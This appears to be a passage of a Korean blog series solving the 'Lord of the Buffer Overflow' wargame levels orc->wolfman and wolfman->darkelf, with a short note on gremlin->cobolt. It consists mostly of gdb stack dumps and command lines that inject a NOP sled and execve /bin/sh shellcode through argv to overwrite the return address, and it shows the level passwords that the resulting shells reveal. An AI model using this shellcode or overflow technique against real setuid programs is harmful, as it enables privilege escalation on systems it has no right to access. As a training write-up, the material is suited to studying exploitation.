0xbfbfbef3: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfbfbf03: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfbfbf13: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfbfbf23: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfbfbf33: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfbfbf43: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfbfbf53: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfbfbf63: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfbfbf73: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfbfbf83: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfbfbf93: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfbfbfa3: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfbfbfb3: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfbfbfc3: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfbfbfd3: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfbfbfe3: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfbfbff3: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfbfc003: 0x00000000 0x00000000 0x00000000 0x00000000

---Type <return> to continue, or q <return> to quit---

0xbfbfc013: 0x00000000 0x00000000 0x00000000 0x00000000

(gdb) x/300wx $esp

0xbffffb8c: 0xbfbffcec 0x00000000 0xbffffbd4 0xbffffbe4

0xbffffb9c: 0x40013868 0x00000003 0x08048450 0x00000000

0xbffffbac: 0x08048471 0x08048500 0x00000003 0xbffffbd4

0xbffffbbc: 0x08048390 0x0804864c 0x4000ae60 0xbffffbcc

0xbffffbcc: 0x40013e90 0x00000003 0xbffffcc7 0xbffffce2

0xbffffbdc: 0xbffffd13 0x00000000 0xbffffe58 0xbffffe7a

0xbffffbec: 0xbffffe84 0xbffffe92 0xbffffeb1 0xbffffec1

0xbffffbfc: 0xbffffeda 0xbffffef7 0xbfffff01 0xbfffff0f

0xbffffc0c: 0xbfffff52 0xbfffff65 0xbfffff7a 0xbfffff8a

0xbffffc1c: 0xbfffff97 0xbfffffb6 0xbfffffc1 0xbfffffce

0xbffffc2c: 0xbfffffd6 0x00000000 0x00000003 0x08048034

0xbffffc3c: 0x00000004 0x00000020 0x00000005 0x00000006

0xbffffc4c: 0x00000006 0x00001000 0x00000007 0x40000000

0xbffffc5c: 0x00000008 0x00000000 0x00000009 0x08048450

0xbffffc6c: 0x0000000b 0x000001f9 0x0000000c 0x000001f9

0xbffffc7c: 0x0000000d 0x000001f9 0x0000000e 0x000001f9

0xbffffc8c: 0x00000010 0x0febfbff 0x0000000f 0xbffffcc2

0xbffffc9c: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffcac: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffcbc: 0x00000000 0x36690000 0x2f003638 0x656d6f68

0xbffffccc: 0x6c6f772f 0x6e616d66 0x706d742f 0x7474612f

0xbffffcdc: 0x6d6b6361 0xbfbf0065 0xbfbfbfbf 0xbfbfbfbf

0xbffffcec: 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf

0xbffffcfc: 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf

---Type <return> to continue, or q <return> to quit---

0xbffffd0c: 0xfcecbfbf 0x9000bfbf 0x90909090 0x90909090

0xbffffd1c: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffd2c: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffd3c: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffd4c: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffd5c: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffd6c: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffd7c: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffd8c: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffd9c: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffdac: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffdbc: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffdcc: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffddc: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffdec: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffdfc: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffe0c: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffe1c: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffe2c: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffe3c: 0x31909090 0x2f6850c0 0x6868732f 0x6e69622f

0xbffffe4c: 0x5350e389 0xb099e189 0x0080cd0b 0x00000000

0xbffffe5c: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffe6c: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffe7c: 0x00000000 0x00000000 0x00000000 0x00000000

---Type <return> to continue, or q <return> to quit---q

Quit

(gdb) q

The program is running. Exit anyway? (y or n) y

[wolfman@localhost tmp]$ ./darkelf `python -c 'print "\xbf"*44+"\x6c\xfd\xff\xb

f"'` `python -c 'print "\x90"*300+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62

\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`

bash: ./darkelf: No such file or directory

[wolfman@localhost tmp]$ ./attackme `python -c 'print "\xbf"*44+"\x6c\xfd\xff\x

bf"'` `python -c 'print "\x90"*300+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x6

2\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`

옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜l

?egmentation fault (core dumped)

[wolfman@localhost tmp]$ gdb -q core

"/home/wolfman/tmp/core": not in executable format: File format not recognized

(gdb) disas main

No symbol table is loaded. Use the "file" command.

(gdb) q

[wolfman@localhost tmp]$ gdb -q attackme

(gdb) b *main+279

Breakpoint 1 at 0x8048617

(gdb) r `python -c 'print "\xbf"*44+"\x6c\xfd\xff\xbf"'` `python -c 'print "\x9

0"*300+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x8

9\xe1\x99\xb0\x0b\xcd\x80"'`

Starting program: /home/wolfman/tmp/attackme `python -c 'print "\xbf"*44+"\x6c\x

fd\xff\xbf"'` `python -c 'print "\x90"*300+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68

\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`

옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜l

?reakpoint 1, 0x8048617 in main ()

(gdb) x/330wx $esp

0xbffffb8c: 0x4000fd6c 0x00000004 0xbffffbd4 0xbffffbe8

0xbffffb9c: 0x40013868 0x00000004 0x08048450 0x00000000

0xbffffbac: 0x08048471 0x08048500 0x00000004 0xbffffbd4

0xbffffbbc: 0x08048390 0x0804864c 0x4000ae60 0xbffffbcc

0xbffffbcc: 0x40013e90 0x00000004 0xbffffcc7 0xbffffce2

0xbffffbdc: 0xbffffd11 0xbffffd13 0x00000000 0xbffffe58

0xbffffbec: 0xbffffe7a 0xbffffe84 0xbffffe92 0xbffffeb1

0xbffffbfc: 0xbffffec1 0xbffffeda 0xbffffef7 0xbfffff01

0xbffffc0c: 0xbfffff0f 0xbfffff52 0xbfffff65 0xbfffff7a

0xbffffc1c: 0xbfffff8a 0xbfffff97 0xbfffffb6 0xbfffffc1

0xbffffc2c: 0xbfffffce 0xbfffffd6 0x00000000 0x00000003

0xbffffc3c: 0x08048034 0x00000004 0x00000020 0x00000005

0xbffffc4c: 0x00000006 0x00000006 0x00001000 0x00000007

0xbffffc5c: 0x40000000 0x00000008 0x00000000 0x00000009

0xbffffc6c: 0x08048450 0x0000000b 0x000001f9 0x0000000c

0xbffffc7c: 0x000001f9 0x0000000d 0x000001f9 0x0000000e

0xbffffc8c: 0x000001f9 0x00000010 0x0febfbff 0x0000000f

0xbffffc9c: 0xbffffcc2 0x00000000 0x00000000 0x00000000

0xbffffcac: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffcbc: 0x00000000 0x36690000 0x2f003638 0x656d6f68

0xbffffccc: 0x6c6f772f 0x6e616d66 0x706d742f 0x7474612f

0xbffffcdc: 0x6d6b6361 0xbfbf0065 0xbfbfbfbf 0xbfbfbfbf

0xbffffcec: 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf

0xbffffcfc: 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf

---Type <return> to continue, or q <return> to quit---

0xbffffd0c: 0xfd6cbfbf 0x9000bf00 0x90909090 0x90909090

0xbffffd1c: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffd2c: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffd3c: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffd4c: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffd5c: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffd6c: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffd7c: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffd8c: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffd9c: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffdac: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffdbc: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffdcc: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffddc: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffdec: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffdfc: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffe0c: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffe1c: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffe2c: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffe3c: 0x31909090 0x2f6850c0 0x6868732f 0x6e69622f

0xbffffe4c: 0x5350e389 0xb099e189 0x0080cd0b 0x00000000

0xbffffe5c: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffe6c: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffe7c: 0x00000000 0x00000000 0x00000000 0x00000000

---Type <return> to continue, or q <return> to quit---

0xbffffe8c: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffe9c: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffeac: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffebc: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffecc: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffedc: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffeec: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffefc: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfffff0c: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfffff1c: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfffff2c: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfffff3c: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfffff4c: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfffff5c: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfffff6c: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfffff7c: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfffff8c: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfffff9c: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfffffac: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfffffbc: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfffffcc: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfffffdc: 0x00000000 0x6f682f00 0x772f656d 0x6d666c6f

0xbfffffec: 0x742f6e61 0x612f706d 0x63617474 0x00656d6b

0xbffffffc: 0x00000000 Cannot access memory at address 0xc0000000

(gdb)

(gdb) q

The program is running. Exit anyway? (y or n) y

[wolfman@localhost tmp]$ bash2

[wolfman@localhost tmp]$ ./attackme `python -c 'print "\xbf"*44+"\x6c\xfd\xff\x

bf"'` `python -c 'print "\x90"*300+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x6

2\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`

옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜l?

풺ash$ id

uid=505(wolfman) gid=505(wolfman) groups=505(wolfman)

bash$ q

sh: q: command not found

bash$ exit

exit

[wolfman@localhost tmp]$ cd ../

[wolfman@localhost wolfman]$ ./darkelf `python -c 'print "\xbf"*44+"\x6c\xfd\xf

f\xbf"'` `python -c 'print "\x90"*300+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f

\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`

옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜l?

풺ash$ id

uid=505(wolfman) gid=505(wolfman) euid=506(darkelf) egid=506(darkelf) groups=505

(wolfman)

bash$ whoami

darkelf

bash$ my-pass

euid = 506

kernel crashed

bash$

'Wargame > LOB (Redhat9)' 카테고리의 다른 글

orge -> troll (0)	2014.02.20
darkelf->orge (0)	2014.02.20
orc -> wolfman (0)	2014.02.20
gremlin -> cobolt (0)	2014.02.20
gate -> gremlin (0)	2014.02.20

Posted by windowhan

,

orc -> wolfman

Wargame/LOB (Redhat9) 2014. 2. 20. 15:11

중간에 코볼트는 어디에 적어뒀는지 기억이 나질않는다;;

[orc@localhost tmp]$ gdb -q wolfman

(gdb) disas main

Dump of assembler code for function main:

0x8048500 <main>: push %ebp

0x8048501 <main+1>: mov %esp,%ebp

0x8048503 <main+3>: sub $0x2c,%esp

0x8048506 <main+6>: cmpl $0x1,0x8(%ebp)

0x804850a <main+10>: jg 0x8048523 <main+35>

0x804850c <main+12>: push $0x8048640

0x8048511 <main+17>: call 0x8048410 <printf>

0x8048516 <main+22>: add $0x4,%esp

0x8048519 <main+25>: push $0x0

0x804851b <main+27>: call 0x8048420 <exit>

0x8048520 <main+32>: add $0x4,%esp

0x8048523 <main+35>: nop

0x8048524 <main+36>: movl $0x0,0xffffffd4(%ebp)

0x804852b <main+43>: nop

0x804852c <main+44>: lea 0x0(%esi,1),%esi

0x8048530 <main+48>: mov 0xffffffd4(%ebp),%eax

0x8048533 <main+51>: lea 0x0(,%eax,4),%edx

0x804853a <main+58>: mov 0x8049760,%eax

0x804853f <main+63>: cmpl $0x0,(%eax,%edx,1)

0x8048543 <main+67>: jne 0x8048547 <main+71>

0x8048545 <main+69>: jmp 0x8048587 <main+135>

0x8048547 <main+71>: mov 0xffffffd4(%ebp),%eax

0x804854a <main+74>: lea 0x0(,%eax,4),%edx

0x8048551 <main+81>: mov 0x8049760,%eax

0x8048556 <main+86>: mov (%eax,%edx,1),%edx

0x8048559 <main+89>: push %edx

0x804855a <main+90>: call 0x80483f0 <strlen>

0x804855f <main+95>: add $0x4,%esp

0x8048562 <main+98>: mov %eax,%eax

0x8048564 <main+100>: push %eax

0x8048565 <main+101>: push $0x0

0x8048567 <main+103>: mov 0xffffffd4(%ebp),%eax

0x804856a <main+106>: lea 0x0(,%eax,4),%edx

0x8048571 <main+113>: mov 0x8049760,%eax

0x8048576 <main+118>: mov (%eax,%edx,1),%edx

0x8048579 <main+121>: push %edx

0x804857a <main+122>: call 0x8048430 <memset>

0x804857f <main+127>: add $0xc,%esp

0x8048582 <main+130>: incl 0xffffffd4(%ebp)

0x8048585 <main+133>: jmp 0x8048530 <main+48>

---Type <return> to continue, or q <return> to quit---

0x8048587 <main+135>: mov 0xc(%ebp),%eax

0x804858a <main+138>: add $0x4,%eax

0x804858d <main+141>: mov (%eax),%edx

0x804858f <main+143>: add $0x2f,%edx

0x8048592 <main+146>: cmpb $0xbf,(%edx)

0x8048595 <main+149>: je 0x80485b0 <main+176>

0x8048597 <main+151>: push $0x804864c

0x804859c <main+156>: call 0x8048410 <printf>

0x80485a1 <main+161>: add $0x4,%esp

0x80485a4 <main+164>: push $0x0

0x80485a6 <main+166>: call 0x8048420 <exit>

0x80485ab <main+171>: add $0x4,%esp

0x80485ae <main+174>: mov %esi,%esi

0x80485b0 <main+176>: mov 0xc(%ebp),%eax

0x80485b3 <main+179>: add $0x4,%eax

0x80485b6 <main+182>: mov (%eax),%edx

0x80485b8 <main+184>: push %edx

0x80485b9 <main+185>: lea 0xffffffd8(%ebp),%eax

0x80485bc <main+188>: push %eax

0x80485bd <main+189>: call 0x8048440 <strcpy>

0x80485c2 <main+194>: add $0x8,%esp

0x80485c5 <main+197>: lea 0xffffffd8(%ebp),%eax

0x80485c8 <main+200>: push %eax

0x80485c9 <main+201>: push $0x8048669

0x80485ce <main+206>: call 0x8048410 <printf>

0x80485d3 <main+211>: add $0x8,%esp

0x80485d6 <main+214>: push $0x28

0x80485d8 <main+216>: push $0x0

0x80485da <main+218>: lea 0xffffffd8(%ebp),%eax

0x80485dd <main+221>: push %eax

0x80485de <main+222>: call 0x8048430 <memset>

0x80485e3 <main+227>: add $0xc,%esp

0x80485e6 <main+230>: leave

0x80485e7 <main+231>: ret

0x80485e8 <main+232>: nop

0x80485e9 <main+233>: nop

0x80485ea <main+234>: nop

0x80485eb <main+235>: nop

0x80485ec <main+236>: nop

0x80485ed <main+237>: nop

0x80485ee <main+238>: nop

---Type <return> to continue, or q <return> to quit---

0x80485ef <main+239>: nop

End of assembler dump.

(gdb) b *main+231

Breakpoint 1 at 0x80485e7

(gdb) r `python -c 'print "\xbf"*44+"\xec\xfc\xff\xbf"'``python -c 'print "\x90

"*300+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89

\xe1\x99\xb0\x0b\xcd\x80"'`

Starting program: /home/orc/tmp/wolfman `python -c 'print "\xbf"*44+"\xec\xfc\xf

f\xbf"'``python -c 'print "\x90"*300+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x

62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`

stack is still your friend.

Program exited normally.

(gdb) r `python -c 'print "\xbf"*44+"\xec\xfc\xbf\xbf"'``python -c 'print "\x90

"*300+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89

\xe1\x99\xb0\x0b\xcd\x80"'`

Starting program: /home/orc/tmp/wolfman `python -c 'print "\xbf"*44+"\xec\xfc\xb

f\xbf"'``python -c 'print "\x90"*300+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x

62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`

옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜賃옜릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱

릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱

릱릱릱릱릱릱릱릱릱릱릱릱릱릱1픐h//shh/bin됥PS됣솻

?

Breakpoint 1, 0x80485e7 in main ()

(gdb) x/200x $esp-100

0xbffffaf8: 0xfffffe75 0x4005d920 0x400143e0 0xbffffb1c

0xbffffb08: 0x40066070 0x40106980 0x4000ae60 0xbffffba4

0xbffffb18: 0xbffffb58 0x080485e3 0xbffffb30 0x00000000

0xbffffb28: 0x00000028 0x00000016 0x00000000 0x00000000

0xbffffb38: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffb48: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffb58: 0xbfbfbfbf 0xbfbffcec 0x90909090 0x90909090

0xbffffb68: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffb78: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffb88: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffb98: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffba8: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffbb8: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffbc8: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffbd8: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffbe8: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffbf8: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffc08: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffc18: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffc28: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffc38: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffc48: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffc58: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffc68: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffc78: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffc88: 0x90909090 0x6850c031 0x68732f2f 0x69622f68

0xbffffc98: 0x50e3896e 0x99e18953 0x80cd0bb0 0x6d6f6800

0xbffffca8: 0x726f2f65 0x6d742f63 0x6f772f70 0x616d666c

0xbffffcb8: 0xbfbf006e 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf

0xbffffcc8: 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf

0xbffffcd8: 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf 0xfcecbfbf

0xbffffce8: 0x9090bfbf 0x90909090 0x90909090 0x90909090

0xbffffcf8: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffd08: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffd18: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffd28: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffd38: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffd48: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffd58: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffd68: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffd78: 0x90909090 0x90909090 0x90909090 0x90909090

---Type <return> to continue, or q <return> to quit---

0xbffffd88: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffd98: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffda8: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffdb8: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffdc8: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffdd8: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffde8: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffdf8: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffe08: 0x90909090 0x90909090 0x90909090 0xc0319090

(gdb)

(gdb) x/200x $esp

0xbffffb5c: 0xbfbffcec 0x90909090 0x90909090 0x90909090

0xbffffb6c: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffb7c: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffb8c: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffb9c: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffbac: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffbbc: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffbcc: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffbdc: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffbec: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffbfc: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffc0c: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffc1c: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffc2c: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffc3c: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffc4c: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffc5c: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffc6c: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffc7c: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffc8c: 0x6850c031 0x68732f2f 0x69622f68 0x50e3896e

0xbffffc9c: 0x99e18953 0x80cd0bb0 0x6d6f6800 0x726f2f65

0xbffffcac: 0x6d742f63 0x6f772f70 0x616d666c 0xbfbf006e

0xbffffcbc: 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf

0xbffffccc: 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf

0xbffffcdc: 0xbfbfbfbf 0xbfbfbfbf 0xfcecbfbf 0x9090bfbf

0xbffffcec: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffcfc: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffd0c: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffd1c: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffd2c: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffd3c: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffd4c: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffd5c: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffd6c: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffd7c: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffd8c: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffd9c: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffdac: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffdbc: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffdcc: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffddc: 0x90909090 0x90909090 0x90909090 0x90909090

---Type <return> to continue, or q <return> to quit---

0xbffffdec: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffdfc: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffe0c: 0x90909090 0x90909090 0xc0319090 0x2f2f6850

0xbffffe1c: 0x2f686873 0x896e6962 0x895350e3 0x0bb099e1

0xbffffe2c: 0x000080cd 0x00000000 0x00000000 0x00000000

0xbffffe3c: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffe4c: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffe5c: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffe6c: 0x00000000 0x00000000 0x00000000 0x00000000

(gdb) q

The program is running. Exit anyway? (y or n) y

[orc@localhost tmp]$ ./wolfman `python -c 'print "\xbf"*44+"\xec\xfd\xff\xbf"'`

`python -c 'print "\x90"*300+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\

x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`

옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜入?릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱?/div>

릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱

릱릱릱릱릱릱릱릱릱릱릱릱릱릱?픐h//shh/bin됥PS됣솻

?

bash$ id

uid=504(orc) gid=504(orc) groups=504(orc)

bash$ q

sh: q: command not found

bash$ exit

exit

[orc@localhost tmp]$ ls

core wolfman

[orc@localhost tmp]$ rm core

[orc@localhost tmp]$ cd ../

[orc@localhost orc]$ ./wolfman `python -c 'print "\xbf"*44+"\xec\xfd\xff\xbf"'`

`python -c 'print "\x90"*300+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\

x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`

옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜入?릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱?/div>

릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱

릱릱릱릱릱릱릱릱릱릱릱릱릱릱?픐h//shh/bin됥PS됣솻

?

bash$ id

uid=504(orc) gid=504(orc) euid=505(wolfman) egid=505(wolfman) groups=504(orc)

bash$ my-pass

euid = 505

love eyuna

bash$

'Wargame > LOB (Redhat9)' 카테고리의 다른 글

orge -> troll (0)	2014.02.20
darkelf->orge (0)	2014.02.20
wolfman -> darkelf (0)	2014.02.20
gremlin -> cobolt (0)	2014.02.20
gate -> gremlin (0)	2014.02.20

Posted by windowhan

,

gremlin -> cobolt

Wargame/LOB (Redhat9) 2014. 2. 20. 15:09

shellcode를 쓰기에는 너무 비좁은 버퍼...

(사실 버퍼가 작지않아도 shellcode는 너무 지저분해서 않쓰려고했음 -_-;; )

어쨋든, 내가 생각한 방법은 2가지이다.

환경변수를 이용하는 방법과, RTL이다.

풀고나서 풀이를 검색해보니 Sasin이라는분이 상당히 독특하게 푸셨다.

argv[2]를 이용하면 저 비좁은 버퍼따위 문제가 되지않는다고한다(?)

argv[2]에 nop slide+shellcode를 넣어놓고, argv[1]가 buffer로 복사되어 buffer의 ret에 argv[2]의 주소를 넣는다.

자세한 주소는 http://0xffff.tistory.com/entry/Sasin-0xffff-BOF%EC%9B%90%EC%A0%95%EB%8C%80-2-gremlin-cobolt 에 있다.

